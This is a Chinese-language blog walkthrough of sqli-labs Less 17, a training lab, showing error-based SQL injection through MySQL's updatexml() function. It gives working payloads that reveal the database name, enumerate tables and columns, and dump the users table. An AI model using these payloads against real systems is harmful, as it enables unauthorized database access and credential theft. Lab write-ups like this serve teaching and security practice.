Less 17 (updatexml注入)

最新推荐文章于 2024-06-05 09:47:09 发布
最新推荐文章于 2024-06-05 09:47:09 发布
阅读量694 收藏 4
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/106126679
版权

文章目录

题意分析

通过简单的测试,我们可以知道,这个页面的功能就是更改你所输入的usernamepassword。(就是改密码)通过看源码,我们可以知道,此页面对于username字段有很严格的过滤。因此我们将注入的重点放在password上。同时我们一定要保证输入的用户名一定要是正确的,否则只会返回错误页面。

在这里插入图片描述
通过上面这个测试,我们得到了一条报错信息:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1

通过这条报错语句我们可以得到两个关键的注入信息:

  1. password的类型为单引号包裹的字符型。
  2. 此网站的报错信息没有很好的屏蔽掉,我们可以利用报错来查表。

updatexml解析

updatexml是SQL语法的一个函数:
UPDATEXML(XML_document, XPath_string, new_value)
参数:
1: XML_document是String格式,为XML文档对象的名称,文中为Doc
2:XPath_string (Xpath格式的字符串) ,用于匹配第一个参数中的部分内容。(就像使用正则表达式匹配一个文本的特定内容一样)
3: new_value,String格式,替换查找到的符合条件的数据。

在这里,我们利用updatexml函数的报错机制进行注入,原理就是当第二个参数的格式和Xpath的格式不符的时候,就会产生报错,我们可以将我们的payload构造到第二个参数中,让其随着报错信息展示到页面上。

实战

先将注入的格式给出:
admin' or updatexml(1, (concat('#',(payload))), 1) #

首先看一下当前数据库的名称:
admin' or updatexml(1, concat('#', database()), 1) #
在这里插入图片描述
然后查看当前数据库中有哪些数据表:
updatexml(1, concat("#", (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0) #

在这里插入图片描述
由此我们得到该数据库下有4张数据表。我们现在来查一下users表。

首先看一下users表都有什么字段:
updatexml(1, concat("#", (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")), 0) #
在这里插入图片描述
可以看到有三个字段id, username, password

那么,最后一步就是进行表的检索。
我们先用以上逻辑进行sql注入的构造:
updatexml(1, concat("#", (select group_concat(username) from users)), 0) #
当我们试图用上述语句查询username字段的时候,发现报了一个错误:
You can't specify target table 'users' for update in FROM clause
那么我们该换一下思路,使用基于from的子查询,将payload构造到from的子查询中。如下:

' or updatexml(1, concat('#', (select * from (select group_concat(username) from users) a)), 0) #
在这里插入图片描述
查询密码同理,由此我们就可以得到所有的数据了。

老司机开代码
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
24-3 SQl 注入 - 利用报错函数updatexml及extracevalue
weixin_43263566的博客
02-11 1051
改变文档中符合条件的节点,使用不同的 XML 标记匹配和替换 XML 块的函数。:String 格式,为 XML 文档对象的名称。:XPath 格式的字符串,代表路径。new_value:String 格式,用于替换查找到的符合条件的数据。通过提供一个 XML 标记片段和 XPath 表达式,从 XML 文档中提取值的函数。xml_frag:XML 标记片段,即 XML 文档对象。xpath_expr:XPath 表达式,用于定位需要提取的值。
Less
01-07
Less基础 css存在的弊端 css是一门非程序式与语言,没有变量、函数、scope(作用域)等概念 css需要书写大量看似没有逻辑的代码,css冗余度是比较高的 不方便维护和扩展,不利于复用 css没有很好的计算能力 非前端...
【sqli-labs】Less 5——报错注入updatexml()函数)
用博客做做记录的小白
06-23 2038
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入注入类型为单引号字符型。
SQL注入updatexml报错注入(函数解释)
最新发布
m0_74608722的博客
06-05 469
第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。原因:是因为updatexml(1,database(),1)这种书写的语法格式是正确的,所以不会爆出语法错误,在SQL注入中无法得到想要的库、表、列名(为了得到他们,应该怎样书写呐?正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会报错。
SQL注入----报错注入简介(updatexml
一只web狗
06-21 3384
报错注入updatexml)常用语句
SQL注入,xpath函数updatexml()和extractvalue()报错注入原理
金 帛的博客
04-26 3874
SQL注入之报错注入原理
SQL注入实战之报错注入篇(updatexml extractvalue floor)
qq_41272376的博客
03-03 1380
SQL注入实战之报错注入篇(updatexml extractvalue floor) 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入之报错注入篇。 首先我们来细分一下SQL注入分类 SQL注入分类: 回显正常—> 联合查询 union select 回显报错—> Duplicate entry() extractvalue()    updatexml() 盲注 —>布尔型盲注 基于时间的盲注sleep()
SQL 注入天书.pdf
08-06
Less-1至Less-4逐步引导用户了解如何通过构造恶意输入来执行未授权的数据库查询,揭示了SQL注入的基本攻击手法。 **盲注讲解(Blind Injection)** Background-2介绍了盲注,这是一种更为隐蔽的注入方式,攻击者在...
less.min.js
01-06
less
前端学习笔记-less
05-26
在前端开发领域,LESS(层叠样式表,Low-level Style Sheets)是一种预处理器,它扩展了CSS语言,增加了变量、嵌套规则、运算符、函数等特性,使得CSS编写更加简洁、可维护性更强。本笔记将深入探讨LESS的重要概念、...
less离线安装包
03-14
在IT行业中,前端开发是不可或缺的一部分,而Less作为一款预处理器语言,极大地丰富了CSS的表达能力。Less提供了变量、嵌套规则、运算符、函数等特性,使得CSS代码更加可维护和模块化。在一些没有网络连接或者网络...
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
updatexml函数-报错注入原理学习
热门推荐
身高两米不到的博客
03-17 1万+
注入之前,首先得明白updatexml函数的利用方式以及函数语法。 updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以上是网上搜索的含义,看到以上内容,我不知道是不是有人和
Sqli-labs之Less-17
m0_46315342的博客
06-04 631
                                          &nbs...
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 724
继续学习sqli-labs,本篇是less17
iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)
mooyuan的博客
11-27 1135
iwebsec靶场的SQL注入漏洞的第05关updatexml注入漏洞渗透。​通过源码再来分析下时间盲注关卡重点内容:(1)闭合方式是什么?iwebsec的第05关关卡为数字型注入,无闭合方式(2)注入类别是什么?这部分是报错型盲注(3)是否过滤了关键字?很明显通过源码,iwebsec的时间报错型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透。初学者还是应该以手动注入方法练习,真正了解原理后可以在使用sqlmap来提升速度。
floor报错注入的两种格式
aitong的博客
01-31 456
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
【web安全】——报错注入
Demo不是emo的博客
01-07 1万+
SQL注入之报错注入
sql注入less23
03-16
在less23中,它是一个用于演示SQL注入的示例网站。在该示例中,存在一个漏洞,攻击者可以通过在输入字段中插入恶意的SQL代码来绕过应用程序的验证和过滤机制,从而执行未经授权的数据库操作。 为了防止SQL注入攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值